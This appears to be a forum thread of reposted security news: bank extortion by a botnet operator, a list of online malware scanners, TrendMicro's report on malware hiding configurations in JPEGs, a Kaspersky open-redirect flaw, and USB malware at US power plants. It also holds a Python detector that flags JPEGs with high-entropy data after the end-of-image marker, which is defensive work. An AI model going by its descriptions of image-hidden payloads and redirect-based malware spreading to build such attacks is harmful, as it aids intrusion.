According to Haaretz news, a hacker, who is the operator of the biggest botnet malware network in Israel, has threatened 3 major Israeli banks, i.e. Israel Discount Bank, Bank Yahav and the First International Bank of Israel.

The banks' databases, networks and websites were not breached in this case; rather, the hacker claimed that he holds a huge financial trojan botnet network in Israel that has already infected millions of systems across the nation and collected a massive dump of stolen personal information, passwords, banking information and credit card numbers of 3.7 million users.

The hacker has demanded the payoff in Bitcoin, an untraceable virtual currency, perfect for blackmailers and cyber criminals. Bitcoin is not backed by any central bank or government and can be transferred "peer to peer" between any two people anywhere.

The banks declined to comment on the report and immediately reported the threat to the Israel Police. According to the source, some of them do not see the threat as serious. The Bank of Israel held a meeting on Tuesday on the issue; we will update you soon about their next step with a new article.

Cyber attacks are becoming more and more advanced and sophisticated; more or less any company in the world is on the list of targets to rob. You should keep updating your knowledge about the cyber world to stay safe from all threats.

Source: Hacker threatens to sell data of 3.7 Million Israeli Bank Customers, demands extortion money in Bitcoin

Personal note: Don't be fooled, like the journalists, into using the term "hacker" for every crook who steals money.
15. I decided to post here a list of several sites for analysing malware, URLs and online antivirus scanners. I hope you find it useful :)

Malware Scan
http://www.virustotal.com/ [File and Website]
Jotti's malware scan
Anubis: Analyzing Unknown Binaries
VirSCAN.org - Free Multi-Engine Online Virus Scanner v1.02, Supports 37 AntiVirus Engines!
ThreatExpert - Online File Scanner
Public Sandbox - Submit a Sample for Malware Analysis
Eureka Malware Analysis Page
Wepawet - Home [File and Website]
https://www.metascan-online.com/
Xandora - Your Online Binary Analyser
Free Online Multi Engine Antivirus File and URL Scanner - Powered by NoVirusThanks.org [File and Website]
Irish Cream Service - Free Antivirus Scan Service [File and Website]
ScanThis! Free online virus scanner [File and Website]
Zscaler Zulu URL Risk Analyzer - Zulu

Website Scan
Automated Exploit Analysis
Online Virus Scanner - Scan Links for Malware, Trojans and Viruses
Sucuri SiteCheck - Free Website Malware Scanner
Online Webpage Scanning for Malware Attacks | Web Inspector Online Scan
urlquery.net - Free URL scanner
Servicio de seguridad web, desenmascarame
Scan websites for exploits, malware and other malicious threats using multiple web reputation engines and domain blacklists
jsunpack - a generic JavaScript unpacker [Website, Javascript, PDF, HTML and pcap]
Website/URL/Link Scanner Safety Check for Phishing, Malware, Viruses - ScanURL.net
AVG Online Virus Scanner | Scan Web Pages | AVG LinkScanner Drop Zone
FREE Online Website Malware Scanner | Website Security Monitoring & Malware Removal | Quttera
Dr.Web online scanners
https://www.trustedsource.org/?p=mcafee
UrlScan 3.1 : The Official Microsoft IIS Site
UnThreat Online Scanner

Antivirus Online
http://quickscan.bitdefender.com/ro/
Free Online Virus Scan - Bitdefender Online Virus Scanner
ESET Free Online Scanner :: Complete Malware Detection :: ESET
Emsisoft Web Malware Scan | Dual-Engine Browser Scanner - Free removal of Viruses, Bots, Spyware, Keyloggers, Trojans and Rootkits
Free Online Virus Scan - Antivirus Software - Trend Micro USA
Panda Activescan | Free Online Antivirus | Free Virus Disinfection - Panda Security
https://www.grc.com/x/ne.dll?bh0bkyd2
:: WindowSecurity.com
How To - Remove threats - Removal Tools | F-Secure
Rising Online Virus Scanner
FREE ANTIVIRUS online: ActiveScan 2.0 - PANDA SECURITY
https://security.symantec.com/sscv6/GetBrowser.asp?pkj=QTHYGXMQPHPUCCBMMHL&langid=ie&venid=sym&plfid=00&from=/sscv6/home.asp
PC Flank: Make sure you're protected on all sides.

Source: cleanbytes.net/malware-online-scanners
16. Security researchers at TrendMicro have identified a new type of malware that updates its configuration in a very interesting way. This means that compromised machines are configured to download JPEG files that contain encrypted configuration files/binaries without the victim's knowledge.

The image is hosted on a web server located in the Asia-Pacific region and contains three types of settings:
- configuration file (Type A)
- configuration file (Type B)
- binary content (either DLL or EXE files)

The first type of configuration is the standard C&C settings, which allow the attacker to send instructions to victim machines and customize the hosts or update the malware to use another type of configuration. This technique makes the botnet resilient in case of a functionality issue. The second configuration file contains several process names of anti-malware products and hostnames of the compromised network.

JPEG images may not only include configurations but also host binary content that allows malware authors to update the malicious software packages at any moment. The way cyber-criminals hide their activities is becoming more and more complex, so that their network and techniques are not identified. Hosting a malicious image on a web server is hard to detect with security software. This makes the attack more resilient and not spotted by security software.

JPEG files used by the attacker to host configuration and binaries for the malware

TrendMicro also revealed that reversing the images allowed them to identify hostnames and IP addresses of infected machines/networks and the list of images used in the cyber attack that is accessed by the malware, besides the operating system version installed on infected machines.

Via Image Hosted on Web Server Serving Malware | SecTechno
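A triage check for images of the kind described in this post, added here as an example and not code from the article or from TrendMicro. The post does not say where inside the JPEG the encrypted configuration sits, so the check assumes the common placement after the end-of-image marker (FFD9), which viewers ignore; the sample images are constructed inside the block.

```python
"""Spot JPEGs carrying extra data after the image, as in the post above.

Added example, not from the SecTechno/TrendMicro article. Assumes the payload
is appended after the end-of-image marker (FFD9); walks the segment table to
the real EOI, then reports the trailing length and its Shannon entropy
(an encrypted blob scores near 8 bits/byte, a plain-text config far lower).
"""
import math
from collections import Counter


def jpeg_trailing_data(data: bytes) -> bytes:
    """Return the bytes after the image's EOI marker (b'' if there are none)."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI")
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError("corrupt segment table at offset %d" % pos)
        marker = data[pos + 1]
        if marker == 0xD9:                                # EOI
            return data[pos + 2:]
        if marker == 0xDA:                                # SOS: scan data follows
            # FF inside scan data is stuffed as FF00, so the first FFD9 after SOS is the EOI
            eoi = data.find(b"\xff\xd9", pos + 2)
            return b"" if eoi < 0 else data[eoi + 2:]
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:      # stand-alone markers, no length
            pos += 2
            continue
        pos += 2 + int.from_bytes(data[pos + 2:pos + 4], "big")
    return b""


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; 0.0 for empty input."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0


def assess(data: bytes, min_len: int = 64, min_entropy: float = 7.0) -> dict:
    """Flag a file whose trailing data is long and random-looking enough to be a payload."""
    tail = jpeg_trailing_data(data)
    ent = round(shannon_entropy(tail), 2)
    return {"trailing_bytes": len(tail), "entropy": ent,
            "likely_payload": len(tail) >= min_len and ent >= min_entropy}


def build_sample(payload: bytes) -> bytes:
    """Constructed minimal JPEG: SOI, JFIF APP0, an SOS with a stuffed FF00, EOI, then payload."""
    app0 = b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    sos = b"\xff\xda\x00\x08\x01\x01\x00\x00\x3f\x00" + b"\x12\x34\xff\x00\x56"
    return b"\xff\xd8" + app0 + sos + b"\xff\xd9" + payload


if __name__ == "__main__":
    print(assess(build_sample(b"")))                        # clean image
    print(assess(build_sample(bytes(range(256)) * 2)))      # stand-in for an encrypted config
```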
17. Hacker reported vulnerability in Kaspersky website; Demonstrated malware spreading technique

The Cyber Security Analyst 'Ebrahim Hegazy' (@Zigoo0), Consultant at Q-CERT, has found an "Unvalidated Redirection Vulnerability" in the website of the giant security solutions vendor "Kaspersky". Ebrahim, who found a SQL Injection in the "Avira" website last month, this time found an Unvalidated Redirection Vulnerability that could be exploited for various purposes such as:
- Cloned websites (Phishing pages)
- It could also be used by Black Hats for Malware spreading

In this specific case what is very striking is that the link usable for the attacks originates from a security firm like Kaspersky, with serious consequences. Would you trust a link from your security vendor? Absolutely yes! But imagine your security vendor is asking you to download malware!

To explain how dangerous the situation is when your security vendor is vulnerable, Ebrahim Hegazy sent me a video explaining the malware spreading scenario, to simulate a Black Hat exploiting the Unvalidated Redirection Vulnerability in the Kaspersky website to serve malware, explained Ebrahim Hegazy.

After the researcher reported the vulnerability to the Kaspersky team, it took about 2 months to fix the vulnerability; it is really a long time considering that if a hacker had found this flaw before Hegazy he could have spread links using Kaspersky.com. The consequences of leaving such a vulnerability unfixed are critical:
- Wide infection, since the redirection is coming from a trusted source, especially if the attacker registered a domain name similar to Kaspersky.com
- Very bad reputation for the Kaspersky company. Your most trusted resource, "Your Antivirus", will be your worst enemy! Would you trust anything else?
- And many other consequences.

The vulnerability was reported to the Kaspersky web-team and is now fixed.

Via: Hacker reported vulnerability in Kaspersky website; Demonstrated malware spreading technique - The Hacker News
18. Two power plants in the US were affected by malware attacks in 2012, a security authority has said.

US authorities did not specify which plants had been hit - and to what extent

In its latest quarterly newsletter, the US Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) said "common and sophisticated" attacks had taken place. Malware had infected each plant's system after being inadvertently brought in on a USB stick, it said. The ICS-CERT said it expected a rise in the number of similar attacks. Malware can typically be used by cyber-attackers to gain remote access to systems, or to steal data.

In the newsletter, authorities said: "The malware was discovered when an employee asked company IT staff to inspect his USB drive after experiencing intermittent issues with the drive's operation.

"The employee routinely used this USB drive for backing up control systems configurations within the control environment."

And at a separate facility, more malware was found. "A third-party technician used a USB-drive to upload software updates during a scheduled outage for equipment upgrades," the report said. "Unknown to the technician, the USB-drive was infected with crimeware.

"The infection resulted in downtime for the impacted systems and delayed the plant restart by approximately three weeks."

Physical effects

The authority did not go into explicit details regarding the malware itself, but did stress that the use of removable media had to be reviewed and tightened. "Such practices will mitigate many issues that could lead to extended system downtime," it said. "Defence-in-depth strategies are also essential in planning control system networks and in providing protections to reduce the risk of impacts from cyber-events."

In recent years, power plants have been the target of increasingly destructive malware and viruses - a bridge between damage in a digital sense, such as data loss or theft, and actual physical infrastructure. In 2010, the Stuxnet virus was said to have damaged critical parts of Iran's nuclear infrastructure. Security firm Symantec's research said it believed Stuxnet had been designed to hit motors controlling centrifuges and thus disrupt the creation of uranium fuel pellets. A UN weapons inspector later said he believed the attack had set back Iran's nuclear programme. No country has claimed responsibility for the attack, but a New York Times report last year, written by the author of a book on the attacks, pointed the finger at the US. Journalist David E Sanger wrote that the US had acted with the co-operation of Israel.

Via BBC News - US plants hit by USB stick malware attack
19. http://www.geekzone.co.nz/foobar/6229

The original title was How to write a Linux virus in 5 easy steps, but the author updated it after the article was discussed on Slashdot: http://it.slashdot.org/article.pl?sid=09/02/17/1526244